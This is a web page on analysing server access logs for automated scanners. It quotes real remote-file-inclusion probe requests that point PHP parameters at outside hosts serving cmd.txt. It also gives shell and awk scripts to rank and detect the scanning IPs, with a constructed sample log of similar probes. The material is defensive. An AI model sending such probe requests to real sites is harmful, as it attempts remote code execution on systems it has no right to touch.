Softpanorama
(slightly skeptical) Open Source Software Educational Society

May the source be with you, but remember the KISS principle ;-)


Web Scanning Zombies


Recently the number of "strange" access records in the web logs jumped, and it became interesting to analyze the logs and see what those people are doing. Here is one fragment that I found manually:

213.195.77.225 - - [23/Jun/2007:06:00:07 -0700] "GET /Lang/Cilorama/c_%3Cwbr%20/%3Elanguage.shtml/str.php?lang=http://zarafshan.ru/uploads/cmd.txt? HTTP/1.1" 406 383 "-" "libwww-perl/5.79"
213.195.77.225 - - [23/Jun/2007:06:00:07 -0700] "GET /str.php?lang=http://zarafshan.ru/uploads/cmd.txt? HTTP/1.1" 406 339 "-" "libwww-perl/5.79"
213.195.77.225 - - [23/Jun/2007:06:00:08 -0700] "GET /Lang/Cilorama/c_%3Cwbr%20/str.php?lang=http://zarafshan.ru/uploads/cmd.txt? HTTP/1.1" 406 364 "-" "libwww-perl/5.79"
213.195.77.225 - - [23/Jun/2007:06:08:12 -0700] "GET /Scripting/Phprama/%3Cwbr%20/%3Ecommand_line_php.shtml/str.php?l=http://zarafshan.ru/uploads/cmd.txt? HTTP/1.1" 406 393 "-" "libwww-perl/5.79"
213.195.77.225 - - [23/Jun/2007:06:08:13 -0700] "GET /str.php?l=http://zarafshan.ru/uploads/cmd.txt? HTTP/1.1" 406 339 "-" "libwww-perl/5.79"
213.195.77.225 - - [23/Jun/2007:06:08:13 -0700] "GET /Scripting/Phprama/%3Cwbr%20/str.php?l=http://zarafshan.ru/uploads/cmd.txt? HTTP/1.1" 406 366 "-" "libwww-perl/5.79"
66.230.197.170 - - [23/Jun/2007:06:25:53 -0700] "GET /str.php?l=http://zarafshan.ru/uploads/cmd.txt? HTTP/1.1" 406 339 "-" "libwww-perl/5.805"
24.117.228.198 - - [23/Jun/2007:06:27:48 -0700] "GET /load_lang.php?_SERWEB[serwebdir]=http://dezzign.ru/echo? HTTP/1.1" 404 168 "-" "libwww-perl/5.803"

One thing these records have in common is the use of libwww-perl as the user agent. Grepping for this string gives a more complete picture, reproduced in the Zombies bulletin.

Extracting the IP addresses gives you a first draft of the "blacklist", and the top dozen can be used to block those rogue addresses from accessing your site. To get such a "dirty dozen" you can use a simple pipe, which can be made into a function or shell script:

# $1 is the access log; the ranked list is written to $1.dirty
grep 'libwww.perl' "$1" | cut -d' ' -f 1 | sort -n | uniq -c | sort -rn | head -12 > "$1.dirty"

Below are the results of processing the list above:

20	83.149.125.174	home.w-sieci.pl
18	80.67.20.21	mayermail.de
12	200.69.222.122	contactar01.gestionarnet.com
11	64.78.163.2	nickentgolf.com
11	62.193.224.166	wpc0230.amenworld.com
10	86.109.161.201	lincl239.ns1.couldix.com
 9	87.230.2.113	lvps87-230-2-113.dedicated.hosteurope.de
 9	85.214.55.73	mind-creations.net
 7	193.192.249.157	
 6	87.118.96.254	ns.km22206-02.keymachine.de
 6	72.55.153.108	ip-72-55-153-108.static.privatedns.com
 6	66.147.239.104	host.1sbs.com
 6	216.246.52.59	server.dynasoft.com.ph
 6	213.195.77.225	225.77.195.213.ibercom.com
 5	217.115.197.51	node11.cluster.nxs.nl
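
An added example (not part of the original page): a field-aware version of the same ranking. It matches libwww-perl only in the User-Agent field and also counts requests whose query parameter value is itself a URL, the pattern seen in the fragment above, so a visitor who merely requests a page with libwww-perl in its name is not listed. The log lines, the addresses and the function names sample_log and scan_suspects are constructed for illustration.

```sh
#!/bin/sh
# Added example, not from the original page. Reads a combined-format access
# log on stdin and prints "count ip reason" for the top N scanning clients.
scan_suspects() {
    top=${1:-12}
    awk -F'"' '
        NF < 7 { next }                      # not a combined-format line
        {
            split($1, head, " "); ip = head[1]
            # User-Agent is the last quoted field, so a URL or referer that
            # merely contains the string libwww-perl does not count.
            is_ua  = ($(NF-1) ~ /^libwww-perl\//)
            # Request field only: a parameter whose value is itself a URL
            # (plain or percent-encoded), as in the str.php?lang=http:// probes.
            is_rfi = ($2 ~ /[?&][^=&]*=(https?|ftp)(:|%3[Aa])(\/|%2[Ff])/)
            if (is_ua)  ua_hit[ip]  = 1
            if (is_rfi) rfi_hit[ip] = 1
            if (is_ua || is_rfi) n[ip]++
        }
        END {
            for (ip in n) {
                t = ""
                if (ip in ua_hit)  t = "ua"
                if (ip in rfi_hit) t = (t == "" ? "rfi" : t "+rfi")
                printf "%d %s %s\n", n[ip], ip, t
            }
        }' | LC_ALL=C sort -k1,1nr -k2,2 | head -n "$top"
}

# Constructed sample log (documentation addresses and example hosts only),
# modelled on the fragment above. Line 4 is an ordinary visitor whose URL and
# referer contain the string; line 5 is a probe with a browser-like agent.
sample_log() {
    cat <<'EOF'
203.0.113.5 - - [23/Jun/2007:06:00:07 -0700] "GET /str.php?lang=http://example.invalid/cmd.txt? HTTP/1.1" 406 339 "-" "libwww-perl/5.79"
203.0.113.5 - - [23/Jun/2007:06:00:08 -0700] "GET /Lang/str.php?l=http://example.invalid/cmd.txt? HTTP/1.1" 406 364 "-" "libwww-perl/5.79"
198.51.100.7 - - [23/Jun/2007:06:27:48 -0700] "GET /load_lang.php?_SERWEB[serwebdir]=http://example.invalid/echo? HTTP/1.1" 404 168 "-" "libwww-perl/5.803"
192.0.2.10 - - [23/Jun/2007:06:30:01 -0700] "GET /Scripting/libwww-perl.shtml HTTP/1.1" 200 5120 "http://search.example/?q=libwww-perl&u=http://example.org/" "Mozilla/5.0 (X11; Linux)"
192.0.2.44 - - [23/Jun/2007:06:31:15 -0700] "GET /index.php?page=http%3A%2F%2Fexample.invalid/x.txt HTTP/1.1" 404 168 "-" "Mozilla/4.0 (compatible)"
EOF
}

sample_log | scan_suspects 12
```

On a real log, run it as scan_suspects 12 < access.log and review the list before blocking anything, since shared proxies and legitimate libwww-perl clients can appear in it.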

Old News

Scanning attempts for November, 2009

Filter .php$: 442 different pages-url
Total: 4267 different pages-url